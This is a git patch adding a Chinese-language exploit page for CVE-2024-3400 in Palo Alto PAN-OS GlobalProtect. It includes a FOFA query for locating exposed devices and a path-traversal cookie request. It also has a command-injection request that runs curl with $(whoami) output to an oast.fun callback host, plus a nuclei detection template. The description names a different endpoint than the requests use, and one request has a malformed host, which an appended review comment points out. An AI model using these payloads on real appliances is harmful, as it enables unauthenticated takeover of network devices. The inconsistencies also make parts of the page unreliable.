From 877bc544a6855add86df0e89db8c20980d84a5ef Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 19 Apr 2024 09:30:29 +0800
Subject: [PATCH] =?UTF-8?q?Create=20PAN-OS=E5=AE=89=E5=85=A8=E8=AE=BE?= =?UTF-8?q?=E5=A4=87=E5=AD=98=E5=9C=A8=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E(CVE-2024-3400).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...安全设备存在命令执行漏洞(CVE-2024-3400).md | 65 +++++++++++++++++++
1 file changed, 65 insertions(+)
create mode 100644 PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md
diff --git a/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md b/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md
new file mode 100644
index 0000000..897cad0
--- /dev/null
+++ b/PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400).md
@@ -0,0 +1,65 @@
+## PAN-OS安全设备存在命令执行漏洞(CVE-2024-3400)
+
+PAN-OS安全设备是PaloAlto公司的一款VPN设备,其使管理者无论位于何处都能够通过将下一代安全平台扩展到所有用户保护网络安全。它通过应用平台的功能来了解应用程序的使用情况。它将流量与用户和设备相关联并通过下一代技术实施安全策略来保护流量。其GlobalProtect功能的login.esp接口的Cookie存在未授权远程命令执行漏洞,攻击者可通过该漏洞控制设备。
+
+## fofa
+```
+icon_hash="-631559155"
+```
+
+
+## poc
+```
+POST /ssl-vpn/hipreport.esp HTTP/1.1
+Host: 127.0.0.1
+Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/d94dec78-deb5-440c-9883-99ec1d954ebe)
+
+## Command Injection
+```
+POST /ssl-vpn/hipreport.esp HTTP/1.1
+Host: 127.0.01
+Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+## CVE-2024-3400.yaml
+```
+id: palo-alto-networks-pan-os-command-injection
+info:
+ name: Palo Alto Networks PAN-OS Command Injection Vulnerability
+ author: generated with pdteam AI
+ severity: Critical
+
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/ssl-vpn/hipreport.esp"
+ headers:
+ Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
+ Connection: "close"
+ Content-Type: "application/x-www-form-urlencoded"
+ Content-Length: "0"
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - method: GET
+ path:
+ - "{{BaseURL}}/global-protect/portal/images/poc.txt"
+ matchers:
+ - type: status
+ status:
+ - 403
+```
+
+## 漏洞来源
+- https://github.com/h4x0r-dz/CVE-2024-3400
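Review bot: The description names the Cookie of the `login.esp` endpoint as the vulnerable input, while both requests and the template in this new file send the `SESSID` cookie to `/ssl-vpn/hipreport.esp`; the text should name the endpoint the requests actually use, and the second request's `Host: 127.0.01` should read `Host: 127.0.0.1`. In the template the two `http` entries carry independent status matchers, so a plain 200 on the POST appears to be reported as a finding on its own; a single matcher over both responses, for example a `dsl` expression of the form `status_code_1 == 200 && status_code_2 == 403`, would cut the false positives. The page also gives no defender guidance: I would add a short section stating that the check leaves an empty file under `global-protect/portal/images/` on the appliance, that unexpected files there and under `device_telemetry/minute/` are worth hunting for, and that fixed releases are listed in the vendor advisory for CVE-2024-3400.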